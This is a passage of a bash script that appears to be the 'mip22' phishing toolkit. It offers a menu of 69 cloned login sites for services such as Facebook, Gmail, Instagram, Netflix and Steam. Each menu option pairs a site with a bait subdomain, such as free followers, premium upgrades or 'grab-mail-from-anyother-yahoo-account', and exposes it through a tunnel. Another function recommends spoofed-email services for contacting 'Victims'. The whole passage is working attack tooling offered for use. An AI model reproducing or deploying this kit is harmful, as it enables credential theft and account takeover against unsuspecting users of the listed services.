  494. ${GREEN}[${WHITE}9${GREEN}]${CYAN} Discord ${GREEN}[${WHITE}33${GREEN}]${CYAN} Netflix ${GREEN}[${WHITE}56${GREEN}]${CYAN} Tumblr
  495. ${GREEN}[${WHITE}10${GREEN}]${CYAN} Dota2 ${GREEN}[${WHITE}34${GREEN}]${CYAN} Origin ${GREEN}[${WHITE}57${GREEN}]${CYAN} Twitch
  496. ${GREEN}[${WHITE}11${GREEN}]${CYAN} Dropbox ${GREEN}[${WHITE}35${GREEN}]${CYAN} Outlook ${GREEN}[${WHITE}58${GREEN}]${CYAN} Twitter
  497. ${GREEN}[${WHITE}12${GREEN}]${CYAN} Ebay ${GREEN}[${WHITE}36${GREEN}]${CYAN} Pinterest ${GREEN}[${WHITE}59${GREEN}]${CYAN} Viber Out
  498. ${GREEN}[${WHITE}13${GREEN}]${CYAN} Facebook ${GREEN}[${WHITE}37${GREEN}]${CYAN} Playstation ${GREEN}[${WHITE}60${GREEN}]${CYAN} Vimeo
  499. ${GREEN}[${WHITE}14${GREEN}]${CYAN} Facebook Messenger ${GREEN}[${WHITE}38${GREEN}]${CYAN} Protonmail ${GREEN}[${WHITE}61${GREEN}]${CYAN} Vk
  500. ${GREEN}[${WHITE}15${GREEN}]${CYAN} Facebook Security ${GREEN}[${WHITE}49${GREEN}]${CYAN} Pubg ${GREEN}[${WHITE}62${GREEN}]${CYAN} Whatsapp
  501. ${GREEN}[${WHITE}16${GREEN}]${CYAN} Gmail ${GREEN}[${WHITE}40${GREEN}]${CYAN} Quora ${GREEN}[${WHITE}63${GREEN}]${CYAN} Wordpress
  502. ${GREEN}[${WHITE}17${GREEN}]${CYAN} Goodreads ${GREEN}[${WHITE}41${GREEN}]${CYAN} Reverly ${GREEN}[${WHITE}64${GREEN}]${CYAN} Xanga
  503. ${GREEN}[${WHITE}18${GREEN}]${CYAN} Hotstar ${GREEN}[${WHITE}42${GREEN}]${CYAN} Reddit ${GREEN}[${WHITE}65${GREEN}]${CYAN} Xbox
  504. ${GREEN}[${WHITE}19${GREEN}]${CYAN} Icloud ${GREEN}[${WHITE}43${GREEN}]${CYAN} Reverbnation ${GREEN}[${WHITE}66${GREEN}]${CYAN} Xing
  505. ${GREEN}[${WHITE}20${GREEN}]${CYAN} Influenster ${GREEN}[${WHITE}44${GREEN}]${CYAN} Signal ${GREEN}[${WHITE}67${GREEN}]${CYAN} Yahoo
  506. ${GREEN}[${WHITE}21${GREEN}]${CYAN} Instagram ${GREEN}[${WHITE}45${GREEN}]${CYAN} Skype ${GREEN}[${WHITE}68${GREEN}]${CYAN} Yandex
  507. ${GREEN}[${WHITE}22${GREEN}]${CYAN} Insta Followers ${GREEN}[${WHITE}46${GREEN}]${CYAN} Skyrock ${GREEN}[${WHITE}69${GREEN}]${CYAN} Youtube SUbs
  508. ${GREEN}[${WHITE}23${GREEN}]${CYAN} Insta Followers 2 ${GREEN}[${WHITE}47${GREEN}]${CYAN} Snapchat ${GREEN}[${WHITE}99${GREEN}]${MAGENTA} Main Menu
  509. ${GREEN}[${WHITE}24${GREEN}]${CYAN} Instagram Verify
  510. EOF
  511. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  512. case $REPLY in
  513. 1)
  514. site="adobe"
  515. subdomain='http://adobe-pro-membership-lifetime-for-you'
  516. tunnel;;
  517. 2)
  518. site="amazon"
  519. subdomain='http://amazon-pro-membership-lifetime-for-you'
  520. tunnel;;
  521. 3)
  522. site="apple"
  523. subdomain='http://apple-security-account-login'
  524. tunnel;;
  525. 4)
  526. site="badoo"
  527. subdomain='http://get-2000-euro-free-for-your-acount'
  528. tunnel;;
  529. 5)
  530. site="care2"
  531. subdomain='http://get-2000-tokens-free-for-your-acount'
  532. tunnel;;
  533. 6)
  534. site="clashofclans"
  535. subdomain='http://get-free-character-for-clashofclans-game'
  536. tunnel;;
  537. 7)
  538. site="crunchyroll"
  539. subdomain='http://get-free-character-for-crunchyroll-game'
  540. tunnel;;
  541. 8)
  542. site="deviantart"
  543. subdomain='http://deviantart-upgrade-account-pro-for-free'
  544. tunnel;;
  545. 9)
  546. site="discord"
  547. subdomain='http://discord-upgrade-account-pro-for-free'
  548. tunnel;;
  549. 10)
  550. site="dota2"
  551. subdomain='http://dota-upgrade-account-pro-for-free'
  552. tunnel;;
  553. 11)
  554. site="dropbox"
  555. subdomain='http://get-2TB-cloud-storage-free'
  556. tunnel;;
  557. 12)
  558. site="ebay"
  559. subdomain='http://ebay-upgrade-account-for-free'
  560. tunnel;;
  561. 13)
  562. site="facebook"
  563. subdomain='http://secure-verified-account-for-facebook'
  564. tunnel;;
  565. 14)
  566. site="facebook_messenger"
  567. subdomain='http://messenger-premium-features-for-free'
  568. tunnel;;
  569. 15)
  570. site="facebook_security"
  571. subdomain='http://make-your-facebook-secured-from-hackers'
  572. tunnel;;
  573. 16)
  574. site="gmail"
  575. subdomain='http://get-unlimited-google-drive-free'
  576. tunnel;;
  577. 17)
  578. site="goodreads"
  579. subdomain='http://goodreads-updrade-account-lifetime-free'
  580. tunnel;;
  581. 18)
  582. site="hotstar"
  583. subdomain='http://hotstar-premieum-account-for-free'
  584. tunnel;;
  585. 19)
  586. site="icloud"
  587. subdomain='http://get-2TB-cloud-storage-free'
  588. tunnel;;
  589. 20)
  590. site="influenster"
  591. subdomain='http://update-account-to-premium-free'
  592. tunnel;;
  593. 21)
  594. site="instagram"
  595. subdomain='http://secure-login-for-instagram'
  596. tunnel;;
  597. 22)
  598. site="instagram_followers"
  599. subdomain='http://get-10000-followers-for-instagram'
  600. tunnel;;
  601. 23)
  602. site="instagram_followers_2"
  603. subdomain='http://get-10000-followers-for-instagram'
  604. tunnel;;
  605. 24)
  606. site="instagram_verify"
  607. subdomain='http://instagram-verify-account'
  608. tunnel;;
  609. 25)
  610. site="line"
  611. subdomain='http://line-get-free-tokens-for-speech'
  612. tunnel;;
  613. 26)
  614. site="linkedin"
  615. subdomain='http://get-a-premium-plan-for-linkedin-free'
  616. tunnel;;
  617. 27)
  618. site="livejournal"
  619. subdomain='http://get-a-premium-plan-for-livejournal-free'
  620. tunnel;;
  621. 28)
  622. site="mediafire"
  623. subdomain='http://get-2TB-cloud-storage-free'
  624. tunnel;;
  625. 29)
  626. site="mewe"
  627. subdomain='http://mewe-update-account-to-premium-free'
  628. tunnel;;
  629. 30)
  630. site="microsoft"
  631. subdomain='http://unlimited-onedrive-space-for-free'
  632. tunnel;;
  633. 31)
  634. site="mocospace"
  635. subdomain='http://upgrade-your-mocospace-plan-free'
  636. tunnel;;
  637. 32)
  638. site="myspace"
  639. subdomain='http://upgrade-your-myspace-plan-free'
  640. tunnel;;
  641. 33)
  642. site="netflix"
  643. subdomain='http://upgrade-your-netflix-plan-free'
  644. tunnel;;
  645. 34)
  646. site="origin"
  647. subdomain='http://origin-upgrade-to-premium-account-free'
  648. tunnel;;
  649. 35)
  650. site="outlook"
  651. subdomain='http://unlimited-onedrive-space-for-free'
  652. tunnel;;
  653. 36)
  654. site="pinterest"
  655. subdomain='http://get-a-premium-plan-for-pinterest-free'
  656. tunnel;;
  657. 37)
  658. site="playstation"
  659. subdomain='http://playstation-premium-account-free'
  660. tunnel;;
  661. 38)
  662. site="protonmail"
  663. subdomain='http://protonmail-pro-basics-for-free'
  664. tunnel;;
  665. 39)
  666. site="pubg"
  667. subdomain='http://get-free-character-for-pubs-game'
  668. tunnel;;
  669. 40)
  670. site="quora"
  671. subdomain='http://get-quora-premium-account-for-free-lifetime'
  672. tunnel;;
  673. 41)
  674. site="raverly"
  675. subdomain='http://get-raverly-premium-account-for-free-'
  676. tunnel;;
  677. 42)
  678. site="reddit"
  679. subdomain='http://reddit-official-verified-member-badge'
  680. tunnel;;
  681. 43)
  682. site="reverbnation"
  683. subdomain='http://get-reverbnation-premium-account-for-free-'
  684. tunnel;;
  685. 44)
  686. site="signal"
  687. subdomain='http://signal-get-free-tokens-for-speech'
  688. tunnel;;
  689. 45)
  690. site="skype"
  691. subdomain='http://skype-get-free-tokens-for-speech'
  692. tunnel;;
  693. 46)
  694. site="skyrock"
  695. subdomain='http://skyrock-upgrade-to-premium-account-free'
  696. tunnel;;
  697. 47)
  698. site="snapchat"
  699. subdomain='http://view-locked-snapchat-accounts-secretly'
  700. tunnel;;
  701. 48)
  702. site="socialclub"
  703. subdomain='http://-socialclub-update-account-to-premieum-free'
  704. tunnel;;
  705. 49)
  706. site="spotify"
  707. subdomain='http://convert-your-account-to-spotify-premium'
  708. tunnel;;
  709. 50)
  710. site="stackoverflow"
  711. subdomain='http://stackoverflow-convert-your-account-to-premium'
  712. tunnel;;
  713. 51)
  714. site="steam"
  715. subdomain='http://steam-convert-your-account-to-premium'
  716. tunnel;;
  717. 52)
  718. site="tagget"
  719. subdomain='http://tagget-convert-your-account-to-premium'
  720. tunnel;;
  721. 53)
  722. site="telegram"
  723. subdomain='http://telegram-get-free-tokens-for-speech'
  724. tunnel;;
  725. 54)
  726. site="tiktok"
  727. subdomain='http://get-tiktok-100000-followers-free-at-instant'
  728. tunnel;;
  729. 55)
  730. site="tiktok_followers"
  731. subdomain='http://get-tiktok-100000-followers-free-at-instant'
  732. tunnel;;
  733. 56)
  734. site="tumblr"
  735. subdomain='http://tumblr-upgrade-account-to-premium-free'
  736. tunnel;;
  737. 57)
  738. site="twitch"
  739. subdomain='http://unlimited-twitch-tv-user-for-free'
  740. tunnel;;
  741. 58)
  742. site="twitter"
  743. subdomain='http://get-blue-badge-on-twitter-free'
  744. tunnel;;
  745. 59)
  746. site="viber_out"
  747. subdomain='http://viber-get-free-tokens-for-speech'
  748. tunnel;;
  749. 60)
  750. site="vimeo"
  751. subdomain='http://get-100000-views-for-channel-free'
  752. tunnel;;
  753. 61)
  754. site="vk"
  755. subdomain='http://vk-premium-real-method-2022-free'
  756. tunnel;;
  757. 62)
  758. site="whatsapp"
  759. subdomain='http://get-3000-free-tokens-for-free'
  760. tunnel;;
  761. 63)
  762. site="wordpress"
  763. subdomain='http://get-unlimited-wordpress-traffic-free'
  764. tunnel;;
  765. 64)
  766. site="xanga"
  767. subdomain='http://xanga-update-account-to-premieum'
  768. tunnel;;
  769. 65)
  770. site="xbox"
  771. subdomain='http://xbox-premium-account-new-method-2022'
  772. tunnel;;
  773. 66)
  774. site="xing"
  775. subdomain='http://xing-update-account-to-premieum'
  776. tunnel;;
  777. 67)
  778. site="yahoo"
  779. subdomain='http://grab-mail-from-anyother-yahoo-account-free'
  780. tunnel;;
  781. 68)
  782. site="yandex"
  783. subdomain='http://grab-mail-from-anyother-yandex-account-free'
  784. tunnel;;
  785. 69)
  786. site="youtube_subs"
  787. subdomain='http://get-100000-youtube-subscribers-free'
  788. tunnel;;
  789. #70)
  790. #setup_clone_manual
  791. #tunnel;;
  792. 99) menu;;
  793. *)
  794. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  795. { sleep 0.7; attack;};;
  796. esac
  797. }
  798. attack_manual() {
  799. subdomain='http:secure-login-page'
  800. tunnel_manual
  801. }
  802. email() {
  803. { clear; header; echo; }
  804. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Use this services for send email to Victims \n"
  805. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://www.guerrillamail.com/ \n"
  806. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://emkei.cz/ ${MAGENTA} (recommended) \n"
  807. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://mailspre.com/ \n"
  808. echo -ne "\n\n"
  809. cat <<- EOF
  810. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  811. EOF
  812. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  813. case $REPLY in
  814. 99) menu;;
  815. *)
  816. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  817. { sleep 0.7; email;};;
  818. esac
  819. }
  820. menu() {
  821. { clear; header; echo; }
  822. cat <<- EOF
  823. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Attack Default
  824. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Attack Manual
  825. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apis
  826. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Email
  827. ${GREEN}[${WHITE}5${GREEN}]${CYAN} Vpn
  828. ${GREEN}[${WHITE}6${GREEN}]${CYAN} Sound (pc only)
  829. ${GREEN}[${WHITE}0${GREEN}]${ORANGE} Exit
  830. EOF
  831. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  832. case $REPLY in
  833. 1) attack;;
  834. 2) attack_manual;;
  835. 3) apis;;
  836. 4) email;;
  837. 5) vpn_setup;;
  838. 6) play_music;;
  839. help) help;;
  840. 0)
  841. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${ORANGE} Thanks for using mip22 "${WHITE}
  842. sleep 2
  843. clear
  844. exit 1;;
  845. *)
  846. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  847. { sleep 0.7; menu;};;
  848. esac
  849. }
  850. control_c()
  851. {
  852. echo -e "${RESETBG}"
  853. echo -e "${RESETFG}"
  854. clear
  855. exit 1
  856. }
  857. trap control_c SIGINT
  858. check_os_and_install_packages
  859. check_root_and_os
  860. pid_kill
  861. menu